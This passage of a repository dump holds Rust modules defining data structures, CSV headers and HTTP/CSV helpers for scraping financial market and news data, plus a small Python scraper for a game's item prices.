\"JG1\", \"LMCADS03\", \"LMAHDS03\", \"LMZSDS03\", \"LMSNDS03\", \"O%201\", \"RR1\",\n \"S%201\", \"SM1\", \"BO1\", \"RS1\", \"KC1\", \"SB1\", \"JO1\", \"CT1\", \"OL1\", \"LB1\", \"JN1\", \"DL1\", \"FC1\",\n \"LH1\",\n];\n\npub const BLOOMBERG_STOCK_HEADER: [&'static str; 15] = [\n \"id\",\n \"short_name\",\n \"market_cap\",\n \"co_phone\",\n \"last_update\",\n \"average_volume30_day\",\n \"price\",\n \"open_price\",\n \"high_price\",\n \"low_price\",\n \"low_price52_week\",\n \"high_price52_week\",\n \"number_of_employees\",\n \"price_earnings_ratio\",\n \"shares_outstanding\",\n];\n\npub const YF_META_HEADER: [&'static str; 9] = [\n \"symbol\",\n \"exchange\",\n \"instrument\",\n \"currency\",\n \"first_trade_date\",\n \"reg_mkt_time\",\n \"gmtoffset\",\n \"tz\",\n \"exchange_tz\",\n];\n\npub const YF_CURRENCIES: [&'static str; 23] = [\n \"USD\", \"EUR\", \"JPY\", \"GBP\", \"AUD\", \"CAD\", \"BTC\", \"ETH\", \"NZD\", \"SEK\", \"CHF\", \"HUF\", \"CNY\",\n \"HKD\", \"SGD\", \"INR\", \"MXN\", \"PHP\", \"IDR\", \"THB\", \"MYR\", \"ZAR\", \"RUB\",\n];\n\npub const YF_COMMODITIES: [&'static str; 23] = [\n \"ES\", \"YM\", \"NQ\", \"RTY\", \"ZB\", \"ZN\", \"ZF\", \"ZT\", \"GC\", \"SI\", \"HG\", \"PA\", \"CL\", \"HO\", \"NG\",\n \"RB\", \"BZ\", \"C\", \"KW\", \"SM\", \"BO\", \"S\", \"CT\",\n];\n\npub const REUTERS_COUNTRIES: [&'static str; 17] = [\n \"cn\", \"de\", \"in\", \"jp\", \"uk\", \"us\", \"af\", \"ar\", \"ara\", \"br\", \"ca\", \"es\", \"fr\", \"it\", \"lta\",\n \"mx\", \"ru\",\n];\n\npub const YF_STOCKS: [&'static str; 7] = [\"symbol\", \"t\", \"o\", \"h\", \"l\", \"c\", \"v\"];\n\npub const SA_HEADER: [&'static str; 8] = [\n \"id\",\n \"author_id\",\n \"publish_on\",\n \"title\",\n \"slug\",\n \"ncomments\",\n \"author_name\",\n \"path\",\n];\n\npub const REUTERS_HEADER: [&'static str; 7] = [\n \"id\",\n \"updated\",\n \"headline\",\n \"reason\",\n \"path\",\n \"channel_name\",\n \"channel_path\",\n];\n\npub const WSJ_HEADER: [&'static str; 9] = [\n \"id\",\n \"created\",\n \"name\",\n \"description\",\n \"duration\",\n \"column\",\n \"doctype\",\n \"email\",\n \"thumbnail\",\n];\n\npub const NYT_FEED_HEADER: [&'static str; 16] = [\n \"slug\",\n \"first_pub\",\n \"section\",\n \"subsec\",\n \"by\",\n \"title\",\n \"subheadline\",\n \"abs\",\n \"matrial_type\",\n //\"geo_tag\",\n //\"org_tag\",\n //\"des_tag\",\n //\"per_tag\",\n \"source\",\n \"published\",\n \"created\",\n \"updated\",\n \"url\",\n //\"thumbnail\",\n \"kicker\",\n \"item_type\",\n];\n\npub const NYT_ARCHIVE_HEADER: [&'static str; 12] = [\n \"id\", \"wc\", \"by\", \"pub\", \"doctype\", \"page\", \"headline\", \"kicker\", \"snippet\", \"abstract\", \"url\",\n \"source\",\n];\n\npub const SEC13F_HEADER: [&'static str; 11] = [\n \"nameOfIssuer\",\n \"titleOfClass\",\n \"cusip\",\n \"value\",\n \"sshPrnamt\",\n \"sshPrnamtType\",\n \"investmentDiscretion\",\n \"otherManager\",\n \"Sole\",\n \"Shared\",\n \"None\",\n];\n\npub const GS_HEADER: [&'static str; 6] = [\n \"node_id\",\n \"date\",\n \"title\",\n \"description\",\n \"has_video\",\n \"has_audio\",\n];\n\npub const GUARDIAN_HEADER: [&'static str; 9] = [\n \"id\",\n \"type\",\n \"section_id\",\n \"section_name\",\n \"t\",\n \"title\",\n \"url\",\n \"is_hosted\",\n \"pillar_id\",\n];\n\npub const JPXNEWS_HEADER: [&'static str; 10] = [\n \"kind\",\n \"category\",\n \"corporation\",\n \"ir_category\",\n \"product_category\",\n \"title\",\n \"url\",\n \"year\",\n \"month\",\n \"day\",\n];\n\npub const CME_QUOTE_HEADER: [&'static str; 22] = [\n \"t\",\n \"last\",\n 
\"change\",\n \"prior_settle\",\n \"open\",\n \"close\",\n \"high\",\n \"low\",\n \"high_limit\",\n \"low_limit\",\n \"volume\",\n \"md_key\",\n \"quote_code\",\n \"expiration_month\",\n \"expiration_date\",\n \"product_name\",\n \"product_code\",\n \"uri\",\n \"product_id\",\n \"exchange_code\",\n \"option_uri\",\n \"has_option\",\n];\n\npub const MOODYS_HEADER: [&'static str; 4] = [\"title\", \"source\", \"t\", \"synopsis\"];\n" }, { "alpha_fraction": 0.48202842473983765, "alphanum_fraction": 0.48620784282684326, "avg_line_length": 27.94354820251465, "blob_id": "7b664255b97a1dc212d89b8a5f797195dceb1d77", "content_id": "6d20ec51935818e62ef9f73926e13d5ddb0eae22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3589, "license_type": "no_license", "max_line_length": 95, "num_lines": 124, "path": "/finox/src/nasdaq/realtime.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\nuse chrono::{DateTime, FixedOffset};\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct RealtimeRoot {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl RealtimeRoot {\n pub fn to_new_recs(\n &self,\n t: DateTime<FixedOffset>,\n ) -> (Option<Vec<Vec<String>>>, DateTime<FixedOffset>) {\n return self.data.to_new_recs(t);\n }\n}\n\nimpl crate::HasRecs for RealtimeRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.data\n .to_recs()\n .into_iter()\n .flatten()\n .collect::<Vec<_>>()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub symbol: String,\n pub total_records: i64,\n pub offset: i64,\n pub limit: i64,\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\nimpl Data {\n pub fn to_new_recs(\n &self,\n t: DateTime<FixedOffset>,\n ) -> (Option<Vec<Vec<String>>>, DateTime<FixedOffset>) {\n let mut recs = vec![];\n let mut newest = t;\n for r in self.rows.iter() {\n let tup = r.to_new_rec(&self.symbol, t);\n match tup {\n Some((v, new_t)) => {\n if new_t > newest {\n newest = new_t;\n }\n recs.push(v);\n }\n None => break,\n }\n }\n if newest == t {\n return (None, t);\n }\n //println!(\"new t: {:?}, old t: {:?}\", newest, t);\n return (Some(recs), newest);\n }\n\n pub fn to_recs(&self) -> Vec<Option<Vec<String>>> {\n self.rows\n .iter()\n .map(|x| x.to_rec(&self.symbol))\n .collect::<Vec<Option<Vec<String>>>>()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub nls_time: String,\n pub nls_price: String,\n pub nls_share_volume: String,\n}\n\nimpl Row {\n pub fn to_new_rec(\n &self,\n symbol: &str,\n last_new: DateTime<FixedOffset>,\n ) -> Option<(Vec<String>, DateTime<FixedOffset>)> {\n /* if the current rec has a time newer than the previous newest time\n * then it must be new data\n */\n if let Ok(t) = crate::nls_to_dt(&self.nls_time) {\n if last_new <= t {\n return Some((\n vec![\n symbol.to_string(),\n t.to_rfc3339(),\n self.nls_price.to_string().replace(\"$ \", \"\"),\n self.nls_share_volume.to_string().replace(\",\", \"\"),\n ],\n t,\n ));\n } else {\n return None;\n }\n // prob change, sending true because failed to parse\n }\n return None;\n }\n pub fn to_rec(&self, symbol: &str) -> Option<Vec<String>> {\n if let Ok(t) = 
crate::nls_to_dt(&self.nls_time) {\n return Some(vec![\n symbol.to_string(),\n t.to_rfc3339(),\n self.nls_price.to_string().replace(\"$ \", \"\"),\n self.nls_share_volume.to_string().replace(\",\", \"\"),\n ]);\n }\n return None;\n }\n}\n\npub const NDAQ_REALTIME_HEADER: [&'static str; 4] = [\"symbol\", \"t\", \"x\", \"v\"];\n" }, { "alpha_fraction": 0.605393648147583, "alphanum_fraction": 0.6091134548187256, "avg_line_length": 29.433961868286133, "blob_id": "113506aceef9a333794142b13b8911fa690c3916", "content_id": "f1a7f2a94b9cd144176a69df4fc5e26dc424c4f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3226, "license_type": "no_license", "max_line_length": 97, "num_lines": 106, "path": "/finox/src/nasdaq/info.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n// https://api.nasdaq.com/api/quote/AAPL/info?assetclass=stocks\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct InfoRoot {\n pub data: InfoData,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRec for InfoRoot {\n fn to_rec(&self) -> Vec<String> {\n self.data.to_rec()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct InfoData {\n pub symbol: String,\n pub company_name: String,\n pub stock_type: ::serde_json::Value,\n pub exchange: String,\n pub is_nasdaq_listed: bool,\n pub is_nasdaq100: bool,\n pub is_held: bool,\n pub primary_data: PrimaryData,\n pub secondary_data: ::serde_json::Value,\n pub key_stats: ::serde_json::Value,\n pub market_status: String,\n pub asset_class: String,\n}\n\nimpl InfoData {\n pub fn to_rec(&self) -> Vec<String> {\n let mut rec: Vec<String> = vec![\n self.symbol.to_string(),\n self.company_name.to_string(),\n self.stock_type.to_string(),\n self.exchange.to_string(),\n self.is_nasdaq_listed.to_string(),\n self.is_nasdaq100.to_string(),\n self.is_held.to_string(),\n ];\n rec.append(&mut PrimaryData::to_rec(&self.primary_data));\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct PrimaryData {\n pub last_sale_price: String,\n pub net_change: String,\n pub percentage_change: String,\n pub delta_indicator: String,\n pub last_trade_timestamp: String,\n pub is_real_time: bool,\n}\n\nimpl PrimaryData {\n pub fn to_rec(&self) -> Vec<String> {\n // let ts = self.last_trade_timestamp.split(\"OF \").collect::<Vec<&str>>();\n // println!(\"{:#?}\", ts);\n return vec![\n self.last_trade_timestamp.to_string(), //.split_at(mid: usize),\n // ts[1].to_string(),\n self.last_sale_price.to_string(),\n self.net_change.to_string(),\n self.percentage_change.to_string(),\n self.is_real_time.to_string(),\n self.delta_indicator.to_string(),\n ];\n }\n}\n\n// commodities diff than stocks, serializing to Value\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct KeyStats {\n// #[serde(rename = \"Volume\")]\n// pub volume: gen::LabelValue,\n// #[serde(rename = \"PreviousClose\")]\n// pub previous_close: gen::LabelValue,\n// #[serde(rename = \"OpenPrice\")]\n// pub open_price: gen::LabelValue,\n// #[serde(rename = \"MarketCap\")]\n// pub market_cap: gen::LabelValue,\n//}\n\npub 
const NDAQ_QUOTE_HEADER: [&'static str; 13] = [\n \"symbol\",\n \"company_name\",\n \"stock_type\",\n \"exchange\",\n \"is_nasdaq_listed\",\n \"is_nasdaq100\",\n \"is_held\",\n \"last_trade_timestamp\",\n \"last_sale_price\",\n \"net_change\",\n \"percentage_change\",\n \"is_real_time\",\n \"delta_indicator\",\n];\n" }, { "alpha_fraction": 0.6604278087615967, "alphanum_fraction": 0.6604278087615967, "avg_line_length": 31.807018280029297, "blob_id": "7b2aebac0903fba4534b810e904c73c4c65c6607", "content_id": "25038aea77d9dffd0c2d73996ccd1df28a8e1e3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1870, "license_type": "no_license", "max_line_length": 95, "num_lines": 57, "path": "/finox/src/misc/fix.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n #[serde(rename = \"Header\")]\n pub header: Header,\n #[serde(rename = \"Body\")]\n pub body: Body,\n #[serde(rename = \"Trailer\")]\n pub trailer: Trailer,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Header {\n #[serde(rename = \"BeginString\")]\n pub begin_string: String,\n #[serde(rename = \"MsgType\")]\n pub msg_type: String,\n #[serde(rename = \"MsgSeqNum\")]\n pub msg_seq_num: String,\n #[serde(rename = \"SenderCompID\")]\n pub sender_comp_id: String,\n #[serde(rename = \"TargetCompID\")]\n pub target_comp_id: String,\n #[serde(rename = \"SendingTime\")]\n pub sending_time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Body {\n #[serde(rename = \"SecurityIDSource\")]\n pub security_idsource: String,\n #[serde(rename = \"SecurityID\")]\n pub security_id: String,\n #[serde(rename = \"MDReqID\")]\n pub mdreq_id: String,\n #[serde(rename = \"NoMDEntries\")]\n pub no_mdentries: Vec<NoMdentry>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NoMdentry {\n #[serde(rename = \"MDEntryType\")]\n pub mdentry_type: String,\n #[serde(rename = \"MDEntryPx\")]\n pub mdentry_px: String,\n #[serde(rename = \"MDEntrySize\")]\n pub mdentry_size: String,\n #[serde(rename = \"MDEntryTime\")]\n pub mdentry_time: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Trailer {}\n" }, { "alpha_fraction": 0.7164179086685181, "alphanum_fraction": 0.7164179086685181, "avg_line_length": 13.88888931274414, "blob_id": "66283e8a9b71e2ecf1308ca420630ada1335c4ae", "content_id": "70233839a52e852a1e859c2d47e0442ecbee7736", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 134, "license_type": "no_license", "max_line_length": 20, "num_lines": 9, "path": "/finox/src/news.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub mod gs;\n//pub mod bloomberg;\npub mod moodys;\npub mod guardian;\npub mod sa;\npub mod jpxnews;\npub mod tr;\npub mod nyt;\npub mod wsj;\n" }, { "alpha_fraction": 0.5700498223304749, "alphanum_fraction": 0.5734744668006897, "avg_line_length": 26.930435180664062, "blob_id": "d6b32d2005b98b21504c3cc21ab653e1ddd6b319", 
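Several modules in this dump (`realtime.rs`, `cme.rs`, `wsj.rs`) hang their CSV export off the `HasRec`/`HasRecs` traits declared in `finox/src/nasdaq/gen.rs` further down, so one writer can flatten any API response into string rows. A self-contained sketch of that pattern, assuming nothing beyond the trait shape shown in the source; the `Tick` type and `flatten_all` helper are illustrative stand-ins, not repo code:

```rust
// The export pattern used across the finox modules: each response type
// knows how to flatten itself into CSV-ready string rows.
pub trait HasRecs {
    fn to_recs(&self) -> Vec<Vec<String>>;
}

// Hypothetical response row, standing in for RealtimeRoot, CMERoot, etc.
struct Tick {
    symbol: String,
    price: f64,
    volume: Option<i64>,
}

impl HasRecs for Tick {
    fn to_recs(&self) -> Vec<Vec<String>> {
        vec![vec![
            self.symbol.clone(),
            self.price.to_string(),
            // Missing Option fields become empty cells, the same convention
            // the repo's utils::lilmatcher helpers follow.
            self.volume.map_or(String::new(), |v| v.to_string()),
        ]]
    }
}

// Downstream writers stay generic over the concrete response type.
fn flatten_all<T: HasRecs>(pages: &[T]) -> Vec<Vec<String>> {
    pages.iter().flat_map(|p| p.to_recs()).collect()
}

fn main() {
    let page = Tick { symbol: "AAPL".into(), price: 318.25, volume: None };
    assert_eq!(
        flatten_all(&[page]),
        vec![vec!["AAPL".to_string(), "318.25".to_string(), String::new()]]
    );
}
```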
"content_id": "eb51ad949f4e218db63a4e56478ba5266b1742e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3212, "license_type": "no_license", "max_line_length": 95, "num_lines": 115, "path": "/finox/src/nasdaq/option_chain.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n// use crate::nasdaq::gen::HasRecs;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionChainRoot {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRecs for OptionChainRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs = vec![];\n for row in self.data.option_chain_list.rows.iter() {\n recs.append(&mut row.to_recs())\n }\n return recs;\n }\n //pub fn get_id(&self) -> String {\n // return self.data.option_chain_list.rows[0]\n // .call\n // .symbol\n // .to_string()\n // .split_whitespace()\n // .next()\n // .expect(\"wtf option ticker\")\n // .to_string();\n //}\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub total_record: i64,\n pub last_trade: String,\n pub option_chain_list: OptionChainList,\n pub month_filter: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionChainList {\n pub headers: ::serde_json::Value,\n pub rows: Vec<OptionRow>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionRow {\n pub call: Option<OptionData2>,\n pub put: Option<OptionData2>,\n}\n\nimpl OptionRow {\n pub fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = vec![];\n\n if let Some(c) = &self.call {\n let call: Vec<String> = OptionData2::to_rec(&c);\n recs.push(call);\n }\n if let Some(p) = &self.put{\n\n let put: Vec<String> = OptionData2::to_rec(&p);\n recs.push(put);\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct OptionData2 {\n pub symbol: String,\n pub last: String,\n pub change: String,\n pub bid: String,\n pub ask: String,\n pub volume: String,\n pub openinterest: String,\n pub strike: String,\n pub expiry_date: String,\n pub colour: bool,\n}\n\nimpl OptionData2 {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.symbol.to_string(),\n self.last.to_string().replace(\"--\", \"\"),\n self.change.to_string().replace(\"--\", \"\"),\n self.bid.to_string().replace(\"--\", \"\"),\n self.ask.to_string().replace(\"--\", \"\"),\n self.volume.to_string().replace(\"--\", \"\"),\n self.openinterest.to_string().replace(\"--\", \"\"),\n self.strike.to_string(),\n self.expiry_date.to_string(),\n self.colour.to_string(),\n ];\n }\n}\n\npub const NDAQ_OPTION_HEADER: [&'static str; 10] = [\n \"symbol\",\n \"last\",\n \"change\",\n \"bid\",\n \"ask\",\n \"volume\",\n \"openinterest\",\n \"strike\",\n \"expiry_date\",\n \"colour\",\n];\n" }, { "alpha_fraction": 0.5487805008888245, "alphanum_fraction": 0.5589430928230286, "avg_line_length": 21.363636016845703, "blob_id": "3d47880a1131aaef36fcf27a5b9c51b28bd20894", "content_id": "c0161c1614e55a409eb70ca9c7adce36e94bf479", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 81, "num_lines": 22, "path": "/py/rs.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import utils\n\nROOT = 'http://services.runescape.com/m=itemdb_oldschool/'\n\ndef item_links(link: str) -> list:\n \"\"\"\n\n \"\"\"\n p = utils.page(link)\n t = p.find('tbody')\n rows = t.find_all('tr')\n links = []\n # a_tags = map()\n for row in rows:\n link = row.find('a')\n links.append(link['href'])\n return links\n\nif __name__ == \"__main__\":\n links = item_links(\n 'http://services.runescape.com/m=itemdb_oldschool/top100?list=2&scale=3')\n print(links)\n" }, { "alpha_fraction": 0.5488448739051819, "alphanum_fraction": 0.5600659847259521, "avg_line_length": 25.578947067260742, "blob_id": "6f97c24299b997df6eccd9f2f8253945a2265615", "content_id": "856f876b6d4a729152bc763bb0ccab165db6003e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3030, "license_type": "no_license", "max_line_length": 137, "num_lines": 114, "path": "/finox/src/roses.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use chrono::Utc;\nuse std::{\n //error::Error,\n fs::File,\n io::{prelude::*, BufReader},\n path::Path,\n thread,\n time::Duration,\n};\n\npub const DELAY: std::time::Duration = Duration::from_millis(10);\npub const USER_AGENT: &str = \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\";\n\n#[tokio::main]\npub async fn simple_get(url: String) -> Result<String, reqwest::Error> {\n let client = reqwest::Client::builder()\n .user_agent(USER_AGENT.to_string())\n .build()?;\n let res = client.get(&url).send().await?;\n thread::sleep(DELAY);\n let body = res.text().await?;\n // println!(\"{}: {:#?}\", url, body);\n println!(\"{}\", url);\n Ok(body)\n}\n\n// simple fns arent useful, get 'cant start runtime from within runtime'\n#[tokio::main]\npub async fn simple_json(url: String) -> Result<::serde_json::Value, reqwest::Error> {\n let client = reqwest::Client::builder()\n .user_agent(USER_AGENT.to_string())\n .build()?;\n\n client\n .get(&url)\n .send()\n .await?\n .json::<::serde_json::Value>() // CHANGE TYPE\n .await\n}\n\n// change to take in File?\npub fn write_csv(\n filepath: &Path,\n data: Vec<Vec<String>>,\n header: &[&str],\n) -> Result<(), csv::Error> {\n let mut wtr =\n csv::Writer::from_path(filepath).expect(format!(\"whtf csv {:?}\", filepath).as_ref());\n println!(\"writing {} rows to {:?}\", data.len(), filepath);\n wtr.write_record(header.clone())?;\n wtr.flush()?;\n let len = header.len();\n for row in data.iter() {\n assert_eq!(len, row.len()); // perf hit?\n wtr.write_record(row)?;\n }\n wtr.flush()?;\n Ok(())\n}\n\n// takes File and optional header\npub fn to_csv(\n file: File,\n data: Vec<Vec<String>>,\n header: Option<&[&str]>,\n) -> Result<(), csv::Error> {\n // decide beforehand whether to append or not\n\n let mut wtr = csv::Writer::from_writer(file);\n if let Some(h) = header {\n wtr.write_record(h)?;\n }\n\n for row in data.iter() {\n wtr.write_record(row)?;\n }\n\n wtr.flush()?;\n //println!(\"wrote {} rows to somewhere (TODO File->Path)\", data.len());\n Ok(())\n}\n\npub fn read_tickers(file_name: impl AsRef<Path>) -> Vec<String> {\n let f = File::open(file_name).expect(\"no such file\");\n let buf = BufReader::new(f);\n buf.lines()\n .map(|l| l.expect(\"Could not parse 
line\"))\n .collect()\n}\n\npub fn read_into<'a, T: ?Sized>(file_name: &str) -> Result<Vec<T>, csv::Error>\nwhere\n for<'de> T: serde::Deserialize<'de> + 'a,\n{\n let mut rdr = csv::Reader::from_path(file_name)?;\n let mut iter = rdr.deserialize();\n let mut recs = vec![];\n while let Some(res) = iter.next() {\n let rec: T = res?;\n recs.push(rec);\n }\n Ok(recs)\n}\n\npub fn simppath(s: String, sfx: String) -> String {\n //sfx enum x, f, us\n return format!(\n \"../data/{}_{}_{}.csv\",\n s.to_string(),\n sfx.to_string(),\n Utc::now().to_rfc3339(),\n );\n}\n" }, { "alpha_fraction": 0.6861631870269775, "alphanum_fraction": 0.6880560517311096, "avg_line_length": 29.537572860717773, "blob_id": "f55b3efac70941a33c279ac3584e5d3d5bc761fd", "content_id": "3ecd93ddadf188059ba1f717a69ba0622421da08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5283, "license_type": "no_license", "max_line_length": 95, "num_lines": 173, "path": "/finox/src/misc/graphics.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Graphics {\n pub items: Vec<Graphic>,\n pub expanded: ::serde_json::Value,\n pub cached_module: ::serde_json::Value,\n pub name: String, // asserteq!(name, \"Graphics\")\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Graphic {\n pub attachments: Attachments,\n pub credits: Credits,\n pub headline: String,\n pub headlines: Headlines,\n pub id: String,\n pub metadata: Metadata,\n pub extra_media: ExtraMedia,\n pub minor_updated_at: String,\n pub published_at: String,\n pub quote: ::serde_json::Value,\n pub revision: String,\n pub slug: String,\n pub summary: String,\n pub content_tags: Vec<ContentTag>,\n pub tags: Tags,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub updated_at: String,\n pub url: String,\n pub primary_site: String,\n pub related_stories: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Attachments {\n pub image: ::serde_json::Value,\n pub video: Video,\n pub video_audio: VideoAudio,\n}\n\n//uhoh\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Img {\n pub base_url: String,\n pub description: String,\n pub orig_width: i64,\n pub title: String,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Credits {\n pub author: Vec<Author>,\n pub by: Vec<Author>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Author {\n pub slug: String,\n pub full_name: String,\n pub image: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Headlines {\n pub web: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Metadata {\n pub 
apple_news_free: bool,\n pub disable_ads: bool,\n pub exclude_from_cliff: bool,\n pub exclude_from_paywall: bool,\n pub social: Social,\n pub google_standout: bool,\n pub original: Original,\n pub diff: ::serde_json::Value,\n pub magazine: Option<Magazine>,\n pub theme: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Social {\n pub headline: String,\n pub description: String,\n pub facebook_status: String,\n pub twitter_text: String,\n pub twitter_title: String,\n pub twitter_description: String,\n pub twitter_handle: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Original {\n pub content_tags: Vec<ContentTag>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ContentTag {\n pub id: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub direct_score: Option<f64>,\n pub derived_score: f64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Magazine {\n pub display_strap: ::serde_json::Value,\n pub headline_short: String,\n pub section: String,\n pub page_number: i64,\n pub short_deck: ::serde_json::Value,\n pub postscript: ::serde_json::Value,\n pub document_version: ::serde_json::Value,\n pub platform_version: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ExtraMedia {\n pub thumbnail: ::serde_json::Value,\n pub social: Social2,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Social2 {\n pub default: ::serde_json::Value,\n pub twitter: Option<Twitter>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Twitter {\n pub id: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n #[serde(rename = \"_links\")]\n pub links: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Tags {\n pub editorial_topics: Vec<EditorialTopic>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub 